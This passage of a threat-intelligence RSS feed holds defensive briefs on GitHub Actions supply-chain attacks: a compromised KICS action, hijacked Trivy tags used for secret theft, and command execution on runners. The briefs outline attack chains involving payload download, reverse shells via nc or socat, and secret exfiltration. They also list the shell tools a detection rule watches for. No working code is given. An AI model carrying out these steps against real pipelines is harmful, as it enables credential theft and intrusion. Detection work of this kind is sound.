]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>shell-injection</category><category>github-actions</category><category>supply-chain</category></item><item><title>TeamPCP Compromise of KICS GitHub Action Supply Chain</title><link>https://feed.craftedsignal.io/briefs/2024-06-07-teampcp-kics-supply-chain/</link><pubDate>Mon, 23 Mar 2026 19:20:57 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-06-07-teampcp-kics-supply-chain/</guid><description>TeamPCP conducted a supply chain attack compromising the KICS GitHub Action, impacting users who integrated the compromised version into their CI/CD pipelines.</description><content:encoded><![CDATA[<p>On March 23, 2026, Wiz.io reported a supply chain attack targeting the KICS (Keeping Infrastructure Configuration Secure) GitHub Action. The threat actor, identified as TeamPCP, successfully compromised the KICS GitHub Action, potentially impacting numerous organizations utilizing the action in their CI/CD pipelines. This incident highlights the risks associated with supply chain dependencies and the potential for malicious actors to inject malicious code into widely used software components. The KICS GitHub Action is used to scan infrastructure-as-code (IaC) files for security vulnerabilities, making its compromise a significant security concern. Organizations that used the compromised version of the action may have had their secrets exfiltrated, or their infrastructure configurations altered.</p>
<h2 id="attack-chain">Attack Chain</h2>
<p>Due to the limited information, the attack chain below is based on a typical supply chain compromise scenario:</p>
<ol>
<li>TeamPCP gains unauthorized access to the KICS GitHub Action repository or its build process.</li>
<li>The attacker injects malicious code into the KICS GitHub Action. This code could be designed to exfiltrate sensitive information, modify infrastructure configurations, or establish a backdoor.</li>
<li>A new version of the KICS GitHub Action, containing the malicious code, is released and made available on the GitHub Marketplace.</li>
<li>Organizations using the KICS GitHub Action automatically update to the compromised version through their CI/CD pipelines.</li>
<li>The malicious code executes within the CI/CD environments of victim organizations, potentially gaining access to environment variables, secrets, and other sensitive data.</li>
<li>The malicious code exfiltrates collected data to attacker-controlled infrastructure.</li>
<li>The attacker uses the exfiltrated data to further compromise the victim&rsquo;s infrastructure or gain unauthorized access to their systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the KICS GitHub Action represents a significant supply chain risk. Organizations utilizing the compromised action in their CI/CD pipelines could have experienced exfiltration of sensitive data, including API keys, credentials, and infrastructure configurations. Successful exploitation could lead to unauthorized access to cloud resources, data breaches, and disruption of services. While the exact number of affected organizations remains unclear, the widespread use of KICS suggests a potentially large impact.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Investigate CI/CD pipeline logs for usage of the compromised KICS GitHub Action version (refer to Overview).</li>
<li>Audit GitHub Action dependencies in CI/CD pipelines to identify and remove any unauthorized or suspicious actions (refer to Overview).</li>
<li>Monitor network traffic originating from CI/CD environments for connections to unusual or malicious destinations (based on potential exfiltration in Attack Chain).</li>
<li>Implement stricter access controls and monitoring for GitHub Action repositories and build processes to prevent future supply chain attacks (refer to Overview).</li>
<li>Deploy the Sigma rule detecting suspicious script execution within GitHub Action workflows to identify potential malicious activity (see rule below).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>supply-chain</category><category>github-actions</category><category>ci/cd</category></item><item><title>Trivy Security Scanner GitHub Actions Tag Hijacking for CI/CD Secret Theft</title><link>https://feed.craftedsignal.io/briefs/2026-03-trivy-tag-hijacking/</link><pubDate>Sat, 21 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-trivy-tag-hijacking/</guid><description>Attackers hijacked 75 tags associated with the Trivy Security Scanner GitHub Actions to steal CI/CD secrets from users of the compromised tags.</description><content:encoded><![CDATA[<p>On March 20, 2026, a breach was reported affecting the Trivy Security Scanner GitHub Actions. The incident involved the hijacking of 75 tags associated with the project. While the exact method of tag hijacking is not detailed, the attacker&rsquo;s objective was to steal CI/CD secrets. This attack could affect any project using the compromised tags in their GitHub Actions workflows. Successful exploitation allows an attacker to gain access to sensitive credentials, API keys, and other secrets stored within the CI/CD environment, leading to potential data breaches, supply chain compromise, and unauthorized access to critical systems. Defenders should focus on detecting and preventing unauthorized modifications to GitHub Action workflows and monitoring for suspicious access to CI/CD secrets.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker compromises the GitHub repository or account with permissions to manage tags for the Trivy Security Scanner GitHub Actions.</li>
<li>The attacker creates or modifies existing tags (75 in this case) to point to malicious code repositories.</li>
<li>Users unknowingly include the compromised tags in their GitHub Actions workflows, triggering the malicious code during CI/CD pipeline execution.</li>
<li>The malicious code executes within the user&rsquo;s CI/CD environment, gaining access to environment variables and secrets.</li>
<li>The attacker&rsquo;s code exfiltrates the stolen CI/CD secrets to an external server controlled by the attacker.</li>
<li>The attacker uses the stolen secrets to gain unauthorized access to victim&rsquo;s systems, cloud resources, or code repositories.</li>
<li>The attacker may further compromise the victim&rsquo;s infrastructure, inject malicious code into software builds, or steal sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This attack has the potential to impact a wide range of organizations that rely on the Trivy Security Scanner GitHub Actions in their CI/CD pipelines. The successful theft of CI/CD secrets can lead to significant data breaches, supply chain compromise, and unauthorized access to critical infrastructure. The scope of impact depends on the number of users affected by the compromised tags and the sensitivity of the secrets stored within their CI/CD environments. The incident could result in financial losses, reputational damage, and legal liabilities for affected organizations.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Review GitHub Actions workflows for use of the compromised Trivy Security Scanner tags (reference: Overview).</li>
<li>Implement stricter access controls and multi-factor authentication for GitHub accounts with permissions to manage tags (reference: Attack Chain).</li>
<li>Deploy the Sigma rule to detect suspicious script execution within GitHub Actions workflows (reference: rules).</li>
<li>Monitor network traffic for unusual outbound connections originating from CI/CD environments, indicative of secret exfiltration (reference: rules).</li>
<li>Implement secrets scanning tools to detect exposed credentials and API keys within code repositories and CI/CD environments (reference: Attack Chain).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>supply-chain</category><category>github-actions</category><category>ci/cd</category><category>tag-hijacking</category></item><item><title>Execution via GitHub Actions Runner</title><link>https://feed.craftedsignal.io/briefs/2024-01-github-actions-runner-execution/</link><pubDate>Tue, 02 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-github-actions-runner-execution/</guid><description>Adversaries compromising GitHub Actions workflows can execute arbitrary commands on runner hosts, leading to code execution, reconnaissance, credential harvesting, or network exfiltration.</description><content:encoded><![CDATA[<p>This threat focuses on the exploitation of GitHub Actions runners by malicious actors. By gaining the ability to modify or trigger workflows in a linked GitHub repository, attackers can execute arbitrary commands on the runner host. The attack leverages the <code>Runner.Worker</code> process or shell interpreters launched via runner entrypoint scripts. Successful exploitation can lead to malicious workflow activity, including code execution, reconnaissance, credential harvesting, and network exfiltration. This presents a significant risk, particularly for organizations relying on self-hosted runners, as it allows attackers to potentially compromise the underlying infrastructure and sensitive data. The Elastic detection rule aims to identify such malicious activity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to a GitHub repository linked to a self-hosted runner.</li>
<li>The attacker modifies an existing workflow or creates a new one to inject malicious commands.</li>
<li>The compromised workflow is triggered, initiating the <code>Runner.Worker</code> process on the runner host.</li>
<li>The <code>Runner.Worker</code> process executes a shell interpreter (e.g., bash, sh, zsh) via an entrypoint script.</li>
<li>The shell interpreter executes malicious commands specified in the compromised workflow, such as downloading a payload using <code>curl</code> or <code>wget</code>.</li>
<li>The downloaded payload is executed, establishing a reverse shell connection to an attacker-controlled server using <code>nc</code> or <code>socat</code>.</li>
<li>The attacker performs reconnaissance, credential harvesting, or lateral movement within the runner host and connected network.</li>
<li>Sensitive data is exfiltrated from the compromised runner host to the attacker&rsquo;s infrastructure.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to the complete compromise of the self-hosted runner environment. This could result in the theft of sensitive source code, credentials, and other proprietary information. The attack can also be used as a stepping stone for further attacks on the organization&rsquo;s internal network and infrastructure. Affected sectors include software development, DevOps, and any organization using GitHub Actions with self-hosted runners.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Execution via GitHub Actions Runner</code> to your SIEM to detect suspicious commands executed by the GitHub Actions Runner.</li>
<li>Monitor process creation events for commands like <code>curl</code>, <code>wget</code>, <code>nc</code>, <code>socat</code>, <code>powershell.exe</code>, <code>cmd.exe</code>, <code>bash</code>, and <code>ssh</code> spawned by <code>Runner.Worker</code> or shell interpreters with <code>entrypoint.sh</code> in their command line (see Sigma rule).</li>
<li>Implement strict access control policies for GitHub repositories and workflows to prevent unauthorized modifications.</li>
<li>Regularly review and audit GitHub Actions workflows for suspicious or unexpected commands.</li>
<li>Isolate self-hosted runners in a segmented network to limit the impact of a potential compromise.</li>
<li>Enable Sysmon process-creation logging to provide detailed process execution information for effective detection.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>github-actions</category><category>supply-chain</category><category>execution</category><category>devops</category></item></channel></rss>